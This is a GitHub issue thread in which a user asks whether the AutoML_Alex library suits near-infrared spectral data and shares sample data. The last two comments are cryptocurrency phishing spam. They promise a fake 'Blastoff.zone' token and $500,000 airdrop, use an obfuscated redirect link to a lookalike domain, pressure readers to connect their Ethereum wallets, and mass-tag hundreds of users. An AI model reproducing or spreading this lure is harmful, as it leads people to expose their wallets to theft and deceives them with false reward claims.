### ISSUE TITLE
does it work on spectral data?

### ISSUE THREAD

**Issue by fcoppey** [Alex-Lekov/AutoML_Alex#17]
Hello,

I'm wondering if you have tested it on spectral data? I have NIR Spectroscopy data with 125 variables and using presently TPOT, works very well but looking at your benchmark it seems your approach works better for the kind of data you have developed it for. hence do you recommend testing it on my spectral data or it's not the purpose of it?

thanks

**Comment by Alex-Lekov** [comment]
please send an example of data

**Comment by fcoppey** [comment]
Here you,

92 spectra of about 25 samples (several replicates spectra per sample). Two sheets, first is raw spectra, second is pre-treated, I usually give pre-treated spectra to TPOT.

Y column is target value for regression, then there 125 variables that represent the near infrared spectra with corresponding wavelengths.

Let me know if you need anything else.

Thanks

Florentin




On 30 Sep 2020, at 17:20, Alex Lekov <notifications@github.com<mailto:notifications@github.com>> wrote:



please send an example of data

**Comment by Alex-Lekov** [comment]
deadline expired

**Comment by fcoppey** [comment]
Ok so you didn't have time to try? I sent you the data it seems.

**Comment by kobirbd18** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
sto803, @Smit-create, @FRSR, @AlbertoZago, @MarshallPatty, @Dobbias, @ChocoShell, @limx0, @maxclchen, @siddharthmankar, @polakowo, @ReynardoEW, @nmrodelo, @lleewwiiss, @Alex-Lekov, @stupidhumans, @snelj, @jselmani, @Y4599R, @pseudocodes, @skssu, @ivandika3, @amizzo87, @solanian, @tomcyrus, @hdacebal, @Slay1007, @xfo-0, @AlexShakaev, @balakaygotowar, @Lesvila, @ravinsharma7, @angelmarine, @jonabe, @andywitt1, @HeyWY1, @ShabbirHasan1, @DangThuy-97, @trAve3113r, @julox, @efJerryYang, @JackLongKing, @nigerninja, @niloysaha, @Code0987, @macd42, @Gilkovitch, @gderber, @ysdede, @oldrichsmejkaldouggiles, @sultaniman, @IkViGaa, @vietcuong2816, @paderma, @jansmets, @YVin3D, @AlbertoZago, @Thomashighbaugh, @Buen16, @tlatkowski, @DionysusBenstein, @aarongilman, @Desttro, @faustogut, @Master1978, @ruvr, @ben-jit, @HeyWY1, @dharmatech, @satzynu, @acsybt, @andywitt1, @pd000, @solanian, @wuyongyi, @thysruben, @usmc2033, @sahiljoshi, @briandbecker, @baryshev, @austinsmoss, @Raybrai2211, @calcajack3, @leonardodalinky, @suresh-n, @gnaoh69, @bz77, @tantum101, @Jeisondls, @seungdori, @zivwang, @gderber, @lleewwiiss, @scastellanog, @maxclchen, @omasanori, @vtngx, @nickleefly, @balgithubLinXueyuanStdio, @mnymark, @Blaine-Mason, @Jackyhh, @anilnal, @bianchimro, @krishnaguragain, @Makarand5, @panda151, @AlexShakaev, @loopiezlol, @x00b, @wisfern, @bluecollar, @mastternick, @joe-nano, @FriendlyUser, @kristofmoens, @seekersoftec, @secp600k1, @jacobdwyer16, @Jhvictor4, @OdinLin, @tomcyrus, @leonardodalinky, @Desireokezie, @DigiTecK3D, @hallpassby, @daamine, @dahebolangkuan, @nick-work, @Lesvila, @quantsolo, @raptoravis, @Leslan, @dvdtth, @WheatMaThink, @iewaij, @MihirVangani17, @SathishN, @lguoca, @Yash-weeber, @giatuan1611, @Ksmith2322, @Minish144, @danielgsmith, @atowersc, @bz77, @webbt127, @haberbaypikki622, @eSeR1805, @tantum101, @stupidanon, @julox, @momansoury, @jj-myc, @Michael37263, @cky13579, @xfo-0, @mbtolou, @thisisazeez, @zwd163, @Moccazio, @skssu, @borje, @maniezhilan, @bz77, @Makarand5, @seungdori, @NeonPhoenix, @oldrichsmejkal, @WheatMaThink, @fly51fly, @suresh-n, @ChocoShell, @TechFinZ, @gustavopantiga, @botasylum, @aflansof, @SharadSamaele, @yotofu, @Jhvictor4, @ohjho, @danteGPT, @BreakSecurity, @Polypod, @Prat617, @virajkadam, @KonstantinSat, @jacobdwyer16, @superrr1, @ClimbHillTmr, @dalakatt, @zeeroocooll, @FRSR, @0x4952, @t4vvd, @hodanli, @takajzabetchuk, @SergKlein, @timlautk, @jonabe, @tomfurrier, @samchaaa, @ctopliff, @ashishanildhage, @arkadiusjonczek, @taonos, @owinoalfred, @goodluck-yh, @tillkrischer, @JackLongKing, @aabhi02, @ambresh1, @oakdalesoft, @zhangli344236745, @Xpipe, @20209805, @qwertymjs, @dodid, @quantsolo, @yasindagasan, @rtanwar, @Buen16, @deepwaver, @jj1985, @5oclockshadow, @xiehai1983, @triangulair, @HeisenBug1, @Smit-create, @Alanvofm, @benletchford, @szymanowski, @, @AdiSai, @ProfitPhenom, @anilnal, @baryshev, @mac133k, @krishnaguragain, @yoinks-yoinks, @jamieborder, @rikurb8, @raptoravis, @Lowerce, @hohyoy, @Desttrokryzhikov, @valentinac, @loopiezlol, @uwDavid, @wnklb, @bzz, @Code0987, @eoinerd, @po9mhjrdb, @jonabe, @Lesvila, @Amo-Addai, @Flynail, @JSquaredJace, @eliahburns, @nschlemm, @frankzamboni, @balgithub, @GCsabi, @Resmung0, @dm267, @amarnp85, @Ksmith2322, @raymogg, @luxebeng, @carina28, @nova-land, @leonardodalinky, @danielgsmith, @rtanwar, @softwaredevelop, @scottRuiter, @zhangli344236745, @Y4599R, @crazypythonista, @timaskraft, @jaysonkim, @yyakauleu, @carlosgc, @35Mill, @dharmatech, @smksevov, @bmport, @dodid, @zawadoww, @erick-tejada, @FerrariFrank, @calcajack3, @oakdalesoft, @tlatkowskiyaranhakan, @kdkiss, @Fpratss, @akumidv, @Davivic, @Borzzo, @LinXueyuanStdio, @leonardodalinky, @panda151, @sc-lin, @valentinac, @rahulmr, @h-russet, @phil8192, @haberbay, @limx0, @ishine, @mosiman, @amarnp85, @usmc2033, @RetiredQQ, @lgbongiolo, @zabetchuk, @jmelende-psiklo, @CompoTypo, @21056, @hari-ghatole, @zagwi, @swrogers, @thysruben, @tmohan26, @ashishanildhage, @krishnaguragain, @chinuckb, @theleveragedguess, @ShabbirHasan1, @dabao1257, @EricHeydemann, @leicester70, @aabhi02, @ChrisDover, @yasindagasan, @brndnsvr, @seguidor777, @rizwan236, @trAve3113r, @oakdalesoft, @Pirat83, @chernobyl73, @Gwill

**Comment by kobirbd18** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
